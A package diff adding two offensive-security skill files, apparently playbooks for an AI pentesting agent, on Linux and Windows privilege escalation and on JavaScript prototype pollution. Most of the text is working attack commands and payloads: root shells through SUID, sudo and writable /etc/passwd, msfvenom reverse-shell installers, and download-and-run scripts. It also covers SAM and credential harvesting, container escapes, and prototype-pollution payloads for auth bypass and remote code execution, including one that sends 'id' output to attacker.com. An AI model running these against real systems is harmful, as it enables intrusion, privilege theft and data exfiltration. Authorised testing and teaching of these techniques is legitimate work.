@aegis-scan/skills 0.5.0 → 0.5.1

package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md

@@ -0,0 +1,320 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: privilege-escalation
+description: Linux and Windows privilege escalation techniques covering SUID, sudo, services, credentials, and container escape
+---
+
+# Privilege Escalation
+
+After gaining initial access, the goal is to elevate privileges to root/SYSTEM. Enumerate thoroughly before attempting any exploit — most PE is logic abuse, not CVE exploitation.
+
+## Immediate Triage (Run First)
+
+    id && whoami && hostname && uname -a
+    cat /etc/os-release
+    ip a; netstat -tulpn 2>/dev/null || ss -tulpn
+    cat /etc/passwd | grep -v nologin | grep -v false
+    sudo -l
+
+Automated enumeration — run both, compare results:
+
+    curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh | tee /tmp/linpeas.txt
+    wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh -O /tmp/lse.sh && bash /tmp/lse.sh -l 2
+
+---
+
+## Linux Privilege Escalation
+
+### SUID / SGID Binaries
+
+    find / -perm -4000 -type f 2>/dev/null
+    find / -perm -2000 -type f 2>/dev/null
+
+Cross-reference every result with GTFOBins: https://gtfobins.github.io/
+Common abusable SUIDs: `bash`, `find`, `vim`, `python`, `perl`, `php`, `nmap`, `awk`, `cp`, `mv`
+
+    # nmap (old versions with interactive mode)
+    nmap --interactive
+    nmap> !sh
+
+    # find with SUID
+    find / -name . -exec /bin/sh -p \; -quit
+
+    # Python with SUID
+    python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
+
+### Sudo Misconfigurations
+
+    sudo -l
+
+Key patterns:
+- `NOPASSWD: ALL` → `sudo su` or `sudo bash`
+- `NOPASSWD: /usr/bin/vim` → `sudo vim -c ':!/bin/bash'`
+- `NOPASSWD: /usr/bin/find` → `sudo find / -exec /bin/bash \;`
+- `NOPASSWD: /usr/bin/python*` → `sudo python3 -c 'import pty;pty.spawn("/bin/bash")'`
+- `env_keep+=LD_PRELOAD` → write shared lib that calls setuid(0)+setgid(0)+system("/bin/bash")
+- `(root) NOPASSWD: /path/to/script.sh` → if writable → overwrite with shell
+
+### Cron Jobs and Scheduled Tasks
+
+    crontab -l
+    cat /etc/crontab
+    ls -la /etc/cron.*
+    find / -name "*.sh" -writable 2>/dev/null
+
+Targets:
+- Writable script called by root cron
+- PATH hijack: cron uses relative path, write your own binary earlier in PATH
+- Wildcard injection: `tar -czf /backup/* ` → create `--checkpoint=1 --checkpoint-action=exec=sh privesc.sh`
+
+### Writable Files in Critical Paths
+
+    # /etc/passwd writable (add root user)
+    openssl passwd -1 -salt salt pw123
+    echo 'r00t:$1$salt$hashhere:0:0:root:/root:/bin/bash' >> /etc/passwd
+
+    # /etc/shadow writable — replace root hash
+    # /etc/sudoers writable — add user ALL=(ALL) NOPASSWD:ALL
+
+### Linux Capabilities
+
+    getcap -r / 2>/dev/null
+
+Abusable capabilities:
+- `cap_setuid+ep` on python/perl/ruby → `setuid(0)` then `os.system("/bin/bash")`
+- `cap_net_raw+ep` on ping/tcpdump → packet sniffing
+- `cap_dac_read_search+ep` on tar → read any file
+
+    # python3 with cap_setuid
+    python3 -c "import os; os.setuid(0); os.system('/bin/bash')"
+
+### PATH Hijacking
+
+    echo $PATH
+    find / -writable -type d 2>/dev/null | grep -E "^/(usr/local|home|tmp|opt)"
+
+If root script calls `service`, `cat`, `ps`, etc without full path:
+
+    export PATH=/tmp:$PATH
+    echo '#!/bin/bash\n/bin/bash' > /tmp/service
+    chmod +x /tmp/service
+
+### NFS No_root_squash
+
+    cat /etc/exports
+    showmount -e <target>
+
+If no_root_squash is set: mount from attacker, create SUID binary as root, execute on target.
+
+    # On attacker (as root):
+    mount -t nfs <target>:/shared /mnt/nfs
+    cp /bin/bash /mnt/nfs/rootbash
+    chmod +s /mnt/nfs/rootbash
+    # On target:
+    /shared/rootbash -p
+
+### Docker Group
+
+    id | grep docker
+
+If user is in docker group:
+
+    docker run -it --rm -v /:/mnt alpine chroot /mnt sh
+    # Or: docker run -v /:/host --rm -it alpine chroot /host sh
+
+### LXD/LXC Group
+
+    id | grep lxd
+
+    lxc image import alpine.tar.gz --alias myimage
+    lxc init myimage mycontainer -c security.privileged=true
+    lxc config device add mycontainer host-root disk source=/ path=/mnt/root recursive=true
+    lxc start mycontainer
+    lxc exec mycontainer /bin/sh
+    # Inside: chroot /mnt/root bash
+
+### Kernel Exploits (Last Resort)
+
+    uname -r
+    searchsploit linux kernel $(uname -r | cut -d- -f1)
+
+Common: Dirty COW (CVE-2016-5195), Dirty Pipe (CVE-2022-0847), OverlayFS (CVE-2023-0386)
+
+    # Check dirty pipe (kernel 5.8-5.16)
+    ls -la /proc/self/fd
+
+---
+
+## Windows Privilege Escalation
+
+### Automated Enumeration
+
+    # PowerShell
+    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks
+
+    # WinPEAS
+    .\winpeas.exe > C:\Temp\winpeas_out.txt
+
+### AlwaysInstallElevated
+
+    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+
+Both = 1 → generate malicious MSI:
+
+    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=443 -f msi -o evil.msi
+    msiexec /quiet /qn /i evil.msi
+
+### Unquoted Service Paths
+
+    wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v '\"'
+
+If path: `C:\Program Files\Vulnerable App\service.exe`
+Create: `C:\Program.exe` or `C:\Program Files\Vulnerable.exe`
+
+    sc start VulnerableService
+
+### Weak Service ACLs
+
+    .\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
+    sc config VulnSvc binpath= "C:\Temp\shell.exe"
+    sc start VulnSvc
+
+### SeImpersonatePrivilege / Potato Attacks
+
+    whoami /priv | findstr /i impersonate
+
+If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:
+
+    # JuicyPotatoNG
+    .\JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami > C:\Temp\out.txt"
+
+    # PrintSpoofer (Server 2016/2019, Win10)
+    .\PrintSpoofer.exe -i -c cmd
+
+    # GodPotato (most Windows versions)
+    .\GodPotato.exe -cmd "cmd /c whoami"
+
+### DLL Hijacking
+
+    # Find missing DLLs in Procmon or via:
+    .\Procmon.exe /Quiet /Minimized /BackingFile C:\Temp\log.pml
+
+Look for `NAME NOT FOUND` on DLL load from writable directory.
+
+    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=443 -f dll -o missing.dll
+
+### Stored Credentials
+
+    cmdkey /list
+    runas /savecred /user:admin cmd.exe
+
+    # Registry credentials
+    reg query HKLM /f password /t REG_SZ /s
+    reg query HKCU /f password /t REG_SZ /s
+
+    # Unattend files
+    dir /s *unattend* *sysprep* 2>nul
+
+    # SAM/SYSTEM (if accessible)
+    reg save HKLM\SAM C:\Temp\sam.hive
+    reg save HKLM\SYSTEM C:\Temp\system.hive
+    # Transfer and crack: impacket-secretsdump LOCAL -sam sam.hive -system system.hive
+
+### LAPS Bypass
+
+    # Check if LAPS is installed
+    Get-Command Get-AdmPwdPassword -ErrorAction SilentlyContinue
+
+    # Read password if you have ReadProperty rights
+    Get-AdmPwdPassword -ComputerName <hostname> | Select-Object -ExpandProperty Password
+
+---
+
+## Container Escape
+
+### Check if You're in a Container
+
+    cat /proc/1/cgroup | grep -i docker
+    ls /.dockerenv 2>/dev/null
+    cat /proc/self/status | grep CapEff
+
+### Privileged Container
+
+    # If CapEff includes CAP_SYS_ADMIN:
+    capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}') | grep sys_admin
+
+    # Mount host filesystem
+    mkdir /tmp/hostfs
+    mount /dev/sda1 /tmp/hostfs
+    chroot /tmp/hostfs /bin/bash
+
+### Docker Socket Exposed
+
+    ls -la /var/run/docker.sock
+
+    docker -H unix:///var/run/docker.sock run -it --rm -v /:/mnt alpine chroot /mnt sh
+
+### CVE-2019-5736 (runc Overwrite)
+
+Affects Docker < 18.09.2 — overwrite runc binary via /proc/self/exe on container exec.
+
+### Kubernetes Service Account Token
+
+    cat /var/run/secrets/kubernetes.io/serviceaccount/token
+    APISERVER=https://kubernetes.default.svc
+    curl -s $APISERVER/api/v1/namespaces --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" --insecure
+
+---
+
+## Post-Exploitation Checklist
+
+Once root/SYSTEM:
+
+    # Linux
+    cat /etc/shadow
+    cat ~/.bash_history
+    find / -name "*.key" -o -name "id_rsa" -o -name "*.pem" 2>/dev/null
+    find / -name ".env" 2>/dev/null
+    cat /root/.ssh/authorized_keys
+
+    # Credential files
+    find / -name "wp-config.php" -o -name "database.yml" -o -name "settings.py" 2>/dev/null
+
+    # Pivot: internal network
+    arp -a
+    cat /etc/hosts
+    for port in 22 80 443 3306 5432 6379 27017; do nc -zv <internal_ip> $port 2>&1 | grep open; done
+
+---
+
+## Key Tools
+
+    LinPEAS:         curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
+    WinPEAS:         .\winpeas.exe
+    PowerUp:         IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
+    GTFOBins:        web_search "gtfobins <binary_name>"
+    LOLBAS:          web_search "lolbas <binary_name>"
+    Impacket:        impacket-secretsdump, impacket-psexec, impacket-wmiexec
+    Responder:       responder -I eth0 -wv
+    CrackMapExec:    cme smb <target> -u user -p pass --shares
+    Chisel:          chisel server/client for tunneling
+    Ligolo-ng:       more stable pivot/tunnel tool
+
+---
+
+## Pro Tips
+
+1. Run LinPEAS first, pipe to tee — read while it scans
+2. SUID/capabilities + GTFOBins is fastest path; check before anything else
+3. Cron PATH hijack is often overlooked — trace what root's crontab calls without full path
+4. On Windows, check token privileges first — SeImpersonate is almost always instant SYSTEM
+5. Environment variables leak creds constantly — `env | grep -iE "pass|key|secret|token"`
+6. Always check `/opt/`, `/srv/`, `/var/backups/`, `/home/*/.ssh/` for forgotten configs
+7. If in Docker: check cap_sys_admin, socket, and /proc/sched_debug for host info leaks
+8. Document EVERY privilege gained — screenshot id/whoami output as evidence
+
+## Summary
+
+Most PE chains are: enumerate blindly → find misconfiguration → abuse it. CVE exploitation is last resort. Start with sudo -l, SUID, cron, and stored creds before reaching for kernel exploits.

package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md

@@ -0,0 +1,242 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: prototype-pollution
+description: Prototype pollution attacks covering client-side DOM XSS gadgets, server-side Node.js RCE chains, and framework-specific exploitation
+---
+
+# Prototype Pollution
+
+Prototype pollution lets attackers inject properties into the JavaScript Object prototype, causing those properties to appear on every object in the runtime. Client-side: leads to DOM XSS via gadgets. Server-side (Node.js): leads to RCE, auth bypass, or privilege escalation.
+
+---
+
+## Core Concept
+
+JavaScript property lookup walks the prototype chain. If `Object.prototype.x = "evil"` is set, then `({}).x === "evil"` is true for any object.
+
+Vulnerable merge pattern:
+
+    function merge(target, source) {
+        for (let key in source) {
+            target[key] = source[key];  // No hasOwnProperty check
+        }
+    }
+    merge({}, JSON.parse('{"__proto__":{"admin":true}}'));
+    console.log({}.admin);  // true — Object.prototype polluted
+
+---
+
+## Client-Side Prototype Pollution
+
+### Finding Pollution Sinks
+
+    # URL fragment/query sources commonly parsed and merged
+    # Test: https://target.com/#__proto__[testprop]=testval
+    # Or: https://target.com/?__proto__[testprop]=testval
+
+    # In browser console after visiting URL:
+    Object.prototype.testprop  // Should return "testval" if vulnerable
+
+    # Also test constructor pollution:
+    # ?constructor[prototype][testprop]=testval
+    # ?__proto__.testprop=testval  (dot notation)
+
+### DOM XSS via Gadgets
+
+Once Object.prototype is polluted, look for gadget sinks that use properties from arbitrary objects:
+
+**jQuery gadgets:**
+
+    # html gadget: $.html()/$.append() reads from prototype
+    # Payload: ?__proto__[html]=<img src=1 onerror=alert(1)>
+    # When jQuery does $(element).html(data), it reads .html from prototype if not own property
+
+    # location gadget
+    # Payload: ?__proto__[location]=https://evil.com
+    # Some jQuery plugins do element.location which reads from prototype
+
+**Angular gadgets (legacy AngularJS):**
+
+    # ?__proto__[ng-app]=  → triggers AngularJS bootstrap
+    # ?__proto__[ng-click]=$event.view.alert(1)
+
+**Common gadgets from PortSwigger research:**
+
+    # innerHTML / outerHTML via assign/extend
+    # target[property] = source[property] where property comes from prototype
+
+    # DOMPurify bypass (specific versions):
+    # ?__proto__[ALLOWED_ATTR][0]=onerror
+    # ?__proto__[documentMode]=9  (triggers IE code path in some DOMPurify versions)
+
+**Lodash gadgets:**
+
+    # Lodash _.defaultsDeep() is pollutable
+    # Gadgets via template, set, setWith
+
+### Automated Detection
+
+    # PPScan — browser-based prototype pollution scanner
+    # Use browser_action to visit: https://target.com
+    # Then execute in console:
+    for (let key of ['__proto__', 'constructor', 'prototype']) {
+        let url = new URL(location.href);
+        url.searchParams.set(key + '[testpp123]', 'testval');
+        console.log('Test URL:', url.toString());
+    }
+
+    # DOM Invader (Burp): best automated tool for client-side PP gadget detection
+    # Manual equivalent: inject into all URL/hash/postMessage inputs and check Object.prototype
+
+---
+
+## Server-Side Prototype Pollution (Node.js)
+
+### Vulnerable Merge Patterns
+
+Common vulnerable functions:
+- `_.merge()` in Lodash < 4.17.11
+- `$.extend(true, {}, user_input)` in jQuery (server-side)
+- `merge`, `deepMerge`, `deepAssign`, `extend` in custom code
+- `Object.assign` is NOT vulnerable (shallow + own properties only)
+- `JSON.parse` into merge functions — user controls JSON → pollutes prototype
+
+### RCE via Child Process
+
+After polluting `Object.prototype.env` or `Object.prototype.execArgv`:
+
+    # Payload to inject into JSON/query body:
+    {
+        "__proto__": {
+            "shell": "node",
+            "NODE_OPTIONS": "--inspect=evil.com:8080",
+            "execArgv": ["--eval", "process.mainModule.require('child_process').exec('curl https://attacker.com/$(id)')"]
+        }
+    }
+
+    # Alternative via env:
+    {
+        "__proto__": {
+            "env": {
+                "NODE_OPTIONS": "--require /proc/self/fd/0"
+            },
+            "argv0": "node"
+        }
+    }
+
+### Authentication Bypass
+
+    # If app checks: if (!user.isAdmin) { deny() }
+    # Pollute: Object.prototype.isAdmin = true
+    # POST /api/settings with:
+    {"__proto__": {"isAdmin": true}}
+
+    # If app checks: user.role === 'admin'
+    {"__proto__": {"role": "admin"}}
+
+    # Bypass null check: if (token == null) → pollute Object.prototype
+    {"__proto__": {"token": "anything"}}
+
+### Privilege Escalation via Status Code
+
+    # Some apps check: if (user.status === 'active')
+    # Pollute status on all objects:
+    {"__proto__": {"status": "active", "verified": true, "balance": 999999}}
+
+### Finding Vulnerable Endpoints
+
+Look for endpoints that:
+1. Accept JSON body with nested objects
+2. Merge/extend user input into existing objects
+3. Use `_.merge`, `deep-assign`, `recursive-assign`, `lodash.merge`
+
+    # Test all JSON endpoints:
+    curl -X POST https://target.com/api/settings \
+      -H "Content-Type: application/json" \
+      -d '{"__proto__":{"testprop":"testval"}}'
+
+    # Then check if polluted:
+    curl https://target.com/api/any-endpoint  # Does response include testprop somehow?
+
+    # Also test with constructor:
+    {"constructor": {"prototype": {"testprop": "testval"}}}
+
+---
+
+## Framework-Specific
+
+### Express.js
+
+    # Body parser vulnerabilities (fixed in modern versions)
+    # qs library vulnerable to: a[__proto__][x]=1 in URL-encoded body
+    curl -X POST https://target.com/api/form \
+      -H "Content-Type: application/x-www-form-urlencoded" \
+      -d "user[__proto__][admin]=true"
+
+### Mongoose (MongoDB ORM)
+
+    # Populate/select injection
+    # ?__proto__[populate]=users → may cause unexpected DB queries
+    # Mongoose model methods may be affected by prototype changes
+
+### Pug / Handlebars Templates
+
+    # Pug < 3.0: prototype pollution leads to RCE via template compilation
+    # Payload:
+    {
+        "__proto__": {
+            "block": {
+                "callee": {
+                    "string": "1; process.mainModule.require('child_process').execSync('id > /tmp/pwned')"
+                }
+            }
+        }
+    }
+
+    # Handlebars < 4.7.7: similar RCE path
+    # Template gadget via __defineGetter__ or environment property chains
+
+---
+
+## Automated Tools
+
+    # ppmap — server-side prototype pollution scanner
+    # Install: go install github.com/kleiton0x00/ppmap@latest
+    ppmap -u "https://target.com"
+
+    # Server-Side Prototype Pollution Scanner (Burp extension equivalent via CLI)
+    # Test manually: inject into all JSON bodies and look for behavior changes
+
+    # Nuclei template check
+    nuclei -u https://target.com -t /home/pentester/nuclei-templates/vulnerabilities/ \
+      -tags prototype-pollution -o output/pp_scan.txt
+
+    # Client-side: headless check via browser_action
+    # Use execute_js: Object.prototype.testpp123 === undefined ? 'not polluted' : 'POLLUTED'
+
+---
+
+## Validation
+
+1. Client-side: confirm `Object.prototype.CANARY` is set after visiting the URL
+2. Confirm a gadget executes: use a non-destructive payload like setting `innerHTML` to a static string
+3. Server-side: send `{"__proto__":{"json spaces":10}}` — if JSON response becomes indented, prototype is polluted
+4. For RCE: use OAST callback (curl/DNS) as payload, confirm OOB callback received
+5. Demonstrate business impact: auth bypass or privilege escalation (not just `alert(1)`)
+
+---
+
+## Pro Tips
+
+1. `json spaces` trick: `{"__proto__":{"json spaces":10}}` → indented JSON response = confirmed server-side PP, zero destructive risk
+2. Client-side PP is often in 3rd-party libraries (jQuery plugins, analytics, A/B testing)
+3. Hash-based routing (`#__proto__[x]=1`) is never sent to server — pure client-side test
+4. `constructor[prototype]` is equivalent to `__proto__` but bypasses some naive filters
+5. Look for lodash < 4.17.11 in package.json — vulnerable by default
+6. Prototype pollution + server-side template = almost always RCE
+7. After finding PP, always test for gadgets in ALL JavaScript loaded by the page — not just app code
+
+## Summary
+
+Prototype pollution is finding an object merge function that doesn't sanitize `__proto__` or `constructor.prototype`. Client-side leads to DOM XSS via gadgets. Server-side leads to auth bypass or RCE. The `json spaces` trick is the safest server-side confirmation. Gadget hunting is the hard part — use DOM Invader or manual review.